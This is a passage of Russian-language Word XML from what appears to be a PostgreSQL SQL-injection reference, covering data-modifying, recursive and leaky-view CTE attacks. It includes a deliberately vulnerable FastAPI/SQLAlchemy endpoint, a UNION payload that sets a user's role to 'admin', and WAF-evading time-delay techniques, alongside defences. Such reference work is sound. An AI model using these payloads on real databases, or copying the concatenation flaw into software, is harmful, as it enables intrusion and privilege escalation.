          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Граница с 3.17 (RLS bypass)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.17.1 разбирает CVE-2024-10976 — RLS игнорирует user ID change в subquery/CTE/SQL-функции (R9), специфика </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">RLS-policy plan-cache reuse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. 3.10 — про CTE как самостоятельный класс атак, не привязанный к RLS. Пересечение точечное: оба используют CTE как механизм, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.10 атакует</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через CTE-семантику (DML, recursion, materialization), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.17 атакует</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через CVE в RLS-обработке плана.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Структура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3.10.1 Data-modifying CTE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (R22) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WITH ins AS (INSERT/UPDATE/DELETE ... RETURNING) SELECT ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Smuggling write-операций через SELECT-эндпоинт. Основной payload — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">... UNION SELECT * FROM (WITH x AS (UPDATE users SET role='admin' RETURNING 1) SELECT 1 FROM x) y</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3.10.2 CTE как амплификатор time-based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WITH RECURSIVE r AS (...) SELECT...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> как альтернатива </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_sleep(N)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Когда WAF блокирует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атакующий генерирует delay через recursion /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regexp_replace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с heavy CPU. Связка с 3.4.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3.10.3 Leaky views + CTE materialization</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — view с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">security_barrier=false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (дефолт!) + injection в WHERE с leaky-функцией → плановщик пушит leaky-функцию перед view-фильтром. CTE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WITH ... AS NOT MATERIALIZED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> принудительно сохраняет inline-плана (дефолт PG 12+); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MATERIALIZED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> создаёт фенс. Объяснение, как защититься (security_barrier=on + WITH MATERIALIZED).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Привилегии</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CTE сам по себе </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не требует привилегий</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это синтаксис, доступный всем. Привилегии определяются содержимым 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INSERT/UPDATE/DELETE на целевую таблицу (на ту, в которую пишет CTE)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(CTE рекурсия — общесистемная фича)</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SELECT на view + право CREATE FUNCTION (для leaky-функции)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Для 3.10.1 ключевой нюанс: application-роль часто имеет INSERT/UPDATE на свои таблицы (audit_log, sessions, password_resets) — но это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не должно</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> означать, что любой SELECT-эндпоинт может туда писать. 3.10.1 — про разрыв этой неявной защиты «GET = только чтение».</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Для 3.10.3 —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обычно есть у application-роли по умолчанию (PUBLIC может создавать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схеме до PG 15; с PG 15 — только в собственной user-schema). Без CREATE FUNCTION leaky-функция создаётся через 3.7 (RCE) или 3.13 (privilege escalation).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Уязвимый код — общий для 3.10.x</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Все подразделы 3.10 используют один и тот же FastAPI-эндпоинт с прямой конкатенацией в WHERE — типичный паттерн для админ-фильтров, дашбордов, аналитических query-builder-ов. Чтобы не дублировать, опишем здесь:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># app/api/v1/orders.py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from app.dependencies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@router.get("/orders/filter")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def filter_orders(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    where_clause: str,  # пользовательский фильтр для гибкого поиска</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id, customer_name, total FROM orders_visible WHERE {where_clause}")</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Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">orders_visible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — view с ACL-фильтром (используется в 3.10.3). В 3.10.1 атакующий пишет в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через CTE. В 3.10.2 атакующий запускает recursive CTE для time-based oracle. В 3.10.3 — leaky-предикат в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">where_clause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Дополнительный паттерн уязвимости — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">query-builder с ORM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, где user_input идёт в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">query.where(text(user_input))</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stmt = select(Order).where(text(where_clause))  # text() — escape hatch</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pP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SQLAlchemy не параметризует, конкатенирует как литерал. То же, что f-string.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Стандартная структура подразделов 3.10.1–3.10.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">По </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">conventions.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Суть → Уязвимый код (ссылка на 3.10.0) → Payload + Что доходит → Что произойдёт → Почему работает → Требования → Легитимное использование → Версии → Связанные → Источники.</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WITH Queries (Common Table Expressions)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — основная спецификация.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Data-Modifying Statements in WITH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — DML в CTE, RETURNING.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Rules and Privileges — Updatable views, security_barrier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — основа для 3.10.3.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cheat sheet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — общий контекст CTE injection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.10.1 Data-modifying CTE (R22)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Уязвимый код — см. 3.10.0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Суть</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WITH ... AS (INSERT|UPDATE|DELETE ... RETURNING ...) SELECT ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — синтаксически </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">одна</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL-команда, которая выполняет write и одновременно возвращает результат. Атакующий, инъектирующий в SELECT-эндпоинт, использует CTE-обёртку для подавления факта «эндпоинт пишет в БД» — на парсер-уровне ничего необычного, на wire-protocol-уровне это обычный single-statement Parse/Bind/Execute, проходит через extended-protocol без stacked-queries-блока (см. 3.5).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL поддерживает DML в CTE с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">9.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, включая </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(но не </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">TRUNCATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — не модификация-как-команда). Один CTE может содержать несколько модификаций; каждая видит снапшот данных на старте оператора (не результаты других DML-CTE в той же команде).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload A — INSERT в audit/log-таблицу через UNION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Контекст: SELECT-эндпоинт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/orders/filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> уязвим к UNION-инъекции (см. 3.1). Application-роль имеет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">INSERT INTO audit_log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (запись о действиях самого приложения) — но эндпоинт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/orders/filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
